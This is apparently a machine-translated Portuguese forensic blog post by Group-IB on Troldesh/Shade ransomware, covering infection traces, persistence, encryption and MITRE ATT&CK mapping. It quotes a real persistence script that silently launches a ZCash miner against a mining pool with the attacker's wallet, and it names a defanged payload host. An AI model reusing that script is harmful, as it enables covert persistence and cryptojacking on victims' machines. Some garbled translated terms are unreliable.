Isso é tudo o que resta depois de você: artefatos forenses do ransomware Troldesh (Shade)

imagem

Se você acompanha as notícias , provavelmente conhece um novo ataque em larga escala contra empresas russas do vírus Troldesh ransomware (Shade), um dos mais populares bloqueadores de criptografia entre os cibercriminosos. Somente em junho, o Group-IB descobriu mais de 1.100 e-mails de phishing da Troldesh enviados em nome de funcionários das principais companhias aéreas, revendedores de automóveis e mídia.

Neste artigo, examinaremos os artefatos forenses que podem ser encontrados após um ataque Shade / Troldesh na mídia de um dispositivo comprometido e também compararemos as táticas e técnicas usadas pelos invasores com o MITRE ATT & CK.

Postado por Oleg Skulkin , especialista forense líder do Group-IB

O Troldesh, também conhecido como Shade, XTBL, Trojan.Encoder.858, Da Vinci, No_more_ransome, é um vírus que criptografa arquivos no dispositivo infectado do usuário e requer um resgate para restaurar o acesso às informações. Campanhas recentes com o Troldesh mostraram que agora não apenas criptografa arquivos, mas também mineradores de criptomoedas e gera tráfego para sites para aumentar o tráfego e a receita da publicidade on-line.

A primeira vez que a atividade da Troldesh foi detectada por especialistas do Grupo IB em 2015, eles notaram que o vírus contornou com êxito as ferramentas de proteção antivírus. Os invasores mudavam regularmente o "empacotador" - um programa empacotador que reduz o tamanho do arquivo e dificultava a detecção e a reversão - por causa disso, os programas antivírus frequentemente o ignoravam. Até o final de 2018, o Troldesh se tornou um dos vírus mais populares e entrou com confiança nos três primeiros, juntamente com o RTM e o Pony. Os especialistas da PaloAlto Networks relataram que o Troldesh não está funcionando apenas para fins russos - entre os países afetados pelo ransomware estão os Estados Unidos, Japão, Índia, Tailândia e Canadá.

Vetor de infecção inicial


Normalmente, “Troldesh / Shade” é distribuído por e-mails de phishing com anexos maliciosos, por exemplo, arquivos protegidos por senha que contêm arquivos JS maliciosos, após a abertura da qual o cryptolocker é baixado e iniciado. O que isso significa? Seria uma boa idéia começar nosso estudo analisando os traços da abertura desses arquivos. Onde esses traços podem ser encontrados? Bem, por exemplo, em Jump Lists:

imagem alt

Dados extraídos do arquivo 5f7b5f1e01b83767.automaticDestinations-ms usando JLECmd

Portanto, vemos que o usuário abriu o arquivo com o nome "senha 11.rar sobre o pedido". Mas como ele entrou no sistema? O arquivo está localizado no diretório Downloads, provavelmente foi baixado da Internet. Vamos dar uma olhada no histórico do navegador:

imagem alt

Dados extraídos do arquivo WebCache01.dat usando o Belkasoft Evidence Center

Como você pode ver, o arquivo foi baixado usando o navegador Microsoft Edge e salvo no diretório Downloads. Além disso, logo antes do download, o usuário visitou o site de e-mail, portanto, o arquivo foi recebido por e-mail.
Assim, estamos lidando com a técnica mais comum: T1193 - “Acessório de caça submarina”.

Iniciar e ignorar os mecanismos de proteção


Se olharmos dentro do arquivo, encontraremos um arquivo JS com um nome quase idêntico. Para que o malware seja carregado e comece a funcionar, o usuário deve clicar duas vezes no arquivo especificado. Depois disso, “wscript.exe” iniciará o arquivo JS, que fará o download do arquivo malicioso do mat.tradetoolsfx [.] Com e executará. Podemos encontrar algum vestígio disso no disco? Claro!

Vejamos o arquivo de pré-busca wscript.exe, focando nos arquivos com os quais ele interagiu:
<...>
\ VOLUME {01d3dcb4976cd072-3a97874f} \ USERS \ 0136 \ APPDATA \ LOCAL \ MICROSOFT \ WINDOWS \ INETCACHE \ IE \ OEJ87644 \ 1C [1] .JPG
\ VOLUME {01d3dcb4976cd072-3a97874f} \ USERS \ 0136 \ APPDATA \ LOCAL \ TEMP \ 7ZO84024637 \ DETALHES DO PEDIDO A.JS
<...>
Então, temos dois arquivos interessantes. Primeiro, agora sabemos o nome do arquivo JS que estava no arquivo morto e, segundo, descobrimos o nome do arquivo que ele baixou. É hora de descobrir de onde foi baixado. Vamos dar uma olhada no WebCache01.dat novamente:

imagem alt

Dados recuperados do WebCache01.dat usando ESEDatabaseView

Se decodificarmos o conteúdo do campo ResponseHeaders, obteremos o seguinte:
HTTP / 1.1 200 OK
Tipo de Conteúdo: image / jpeg
Comprimento do conteúdo: 1300656
ETag: "5ced19b6-13d8b0"
Segurança de transporte estrita: max-age = 31536000;
De fato, este não é um arquivo JPG, mas um arquivo executável que descriptografa e inicia uma instância do Shade.
Então, com quais técnicas estamos lidando aqui? Script (T1064), Execução do usuário (T1204) e Mascaramento (T1036).

Pino do sistema


O “Shade” usa uma maneira bastante trivial de corrigir o sistema - a chave do registro “Software \ Microsoft \ Windows \ CurrentVersion \ Run” (T1060). Já sabemos que o arquivo JS malicioso foi aberto pelo usuário "0136", portanto, dê uma olhada no arquivo correspondente "NTUSER.DAT":

imagem alt

O mecanismo de travamento no sistema detectado pelo Belkasoft Evidence Center

Mas isso não é tudo! Mais interessante:
imagem alt

O mecanismo de travamento no sistema detectado pelo Belkasoft Evidence Center

Como você pode ver na ilustração, há outra entrada interessante apontando para C: \ ProgramData \ SysWOW64 \ leWRX7w.cmd. Vamos ver o que há dentro deste arquivo:
echo CreateObject ("Wscript.Shell"). Execute "" ^ & WScript.Arguments (0) ^ & "", 0, False> "% TEMP% / pxNXSB.vbs" && start / WAIT wscript.exe "% TEMP% /pxNXSB.vbs "" C: \ Usuários \ 0136 \ AppData \ Roaming \ SOFTWA ~ 1 \ NHEQMI ~ 1.EXE -l eu1-zcash.flypool.org ∗ 333 -u t1L9iBXyRgaYrQ5JSTSdstopV6pHtZ2Xdep.7B9D281 &% TEMP% \ pxNXSB.vbs "
Então, temos mais um arquivo. A julgar pelo seu conteúdo, é usado pelos atacantes para extrair a criptomoeda ZCash. Assim, mesmo que a vítima pague o resgate, os recursos do seu sistema ainda serão utilizados pelos invasores.

As consequências


Primeiro, “Shade” é um cryptoclocker, então a primeira coisa que chama sua atenção são muitos arquivos com as extensões “CRYPTED000007”, arquivos “Leia-me” e papéis de parede “frescos” na área de trabalho:

imagem alt

Um arquivo com esta imagem pode ser encontrado no diretório C: \ Users \% username% \ AppData \ Roaming. Com que equipamento estamos lidando? "Dados criptografados para impacto" (T1486).
Mas, como você já entendeu, "Shade" não é um armário de criptografia comum. Além do próprio cryptoclocker, também encontramos um mineiro, o que significa que vale a pena mencionar outra técnica - “seqüestro de recursos”.

MITRE ATT & CK


Nossa análise revelou várias táticas e técnicas dos distribuidores Shade, vamos resumir:

IDNomeDescrição do produto
T1193Acessório de caça submarinaO Shade é distribuído por e-mails de phishing com anexos maliciosos
T1204Execução do usuárioO arquivo JS do archive anexado ao email deve ser iniciado pelo usuário.
T1064ScriptOs invasores usam arquivos JS para baixar malware
T1036MascaradaOs arquivos de malware baixados têm a extensão "JPG" em vez de "EXE"
T1060Chaves de execução do registro / pasta de inicialização"Sombra" usa a chave de registro "Software \ Microsoft \ Windows \ CurrentVersion \ Run" para encaixar no sistema
T1486Dados criptografados para causar impactoSombra criptografa arquivos para resgate
T1496Seqüestro de recursosShade usa recursos de computador da vítima para minerar criptomoedas

Source: https://habr.com/ru/post/pt457592/


All Articles